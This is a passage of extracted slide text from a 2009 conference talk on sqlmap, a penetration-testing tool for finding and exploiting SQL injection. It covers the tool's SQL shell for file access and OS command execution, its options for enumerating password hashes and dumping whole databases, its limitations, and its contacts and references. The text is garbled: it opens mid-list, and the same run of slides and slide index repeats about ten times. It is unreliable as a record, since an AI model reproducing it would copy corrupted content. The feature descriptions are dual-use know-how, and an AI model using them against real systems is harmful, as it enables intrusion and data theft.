Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-